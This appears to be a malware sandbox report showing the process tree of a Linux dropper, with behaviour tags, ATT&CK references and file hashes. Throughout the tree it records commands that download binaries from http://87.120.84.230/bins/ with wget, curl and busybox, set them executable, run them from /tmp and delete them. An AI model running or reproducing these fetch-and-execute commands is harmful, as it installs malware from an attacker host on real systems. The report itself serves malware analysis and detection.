/tmp/vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk./vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm vR0twlfSjEym6sdC5fivTLP0C8R1dP5wOk2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:944
-
-
/bin/chmodchmod 777 tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la./tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm tTFpzYCqyhe4fWUy1g3SIRJIUFU41Mi8la2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:950
-
-
/bin/chmodchmod 777 OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b./OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm OfouzRxZTtSNVamz1mZQIznV7dE4YuaU6b2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:956
-
-
/bin/chmodchmod 777 HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV./HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm HkYZxpL3dc8p0ZMn7F8m45vQdBlpx9YBEV2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:962
-
-
/bin/chmodchmod 777 ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM./ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm ccFHe8ICtltyavZwMi5gQk2902b5dbeLYM2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:968
-
-
/bin/chmodchmod 777 tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc./tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm tyIY6FHsOBpMrvSvlISn9DcKzuSkeYW8Dc2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:974
-
-
/bin/chmodchmod 777 fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa./fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm fIoeIff6MFpQtLhDc1qWNbpFaFuzJw6Dpa2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:980
-
-
/bin/chmodchmod 777 Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc./Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm Vnk05wcgiViUbD70yoiK0XazVUrrXGZ1Mc2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97